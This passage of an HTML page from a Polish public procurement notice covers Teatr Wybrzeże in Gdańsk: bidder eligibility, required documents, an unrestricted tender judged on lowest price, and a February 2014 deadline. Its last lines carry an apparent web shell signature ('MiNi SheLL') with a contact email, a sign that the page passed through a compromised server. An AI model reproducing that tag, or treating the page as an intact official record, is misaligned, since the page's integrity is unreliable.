spełnia/nie spełnia na podstawie złożonych przez wykonawcę wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku zgodnie z formułą spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>w celu wykazania reprezentacji należy dołączyć: a) w przypadku osoby prawnej lub jednostki organizacyjnej nieposiadającej osobowości prawnej - aktualny odpis z właściwego rejestru wystawiony nie wcześniej niż 6 miesięcy przed terminem składania ofert, b) w przypadku przedsiębiorcy, który podlega wpisowi do ewidencji działalności gospodarczej aktualne zaświadczenie o wpisie do działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert c) w przypadku działania Wykonawcy przez pełnomocników, pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/jednostki_org_podlegle_marszalkowi/teatr_wybrzeze<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Wybrzeże w Gdańsku przy ul. Świętego Ducha 2, 80-834 Gdańsk, pok.218..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2014 godzina 10:00, miejsce: Teatr Wybrzeże w Gdańsku przy ul. Świętego Ducha 2, 80-834 Gdańsk, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com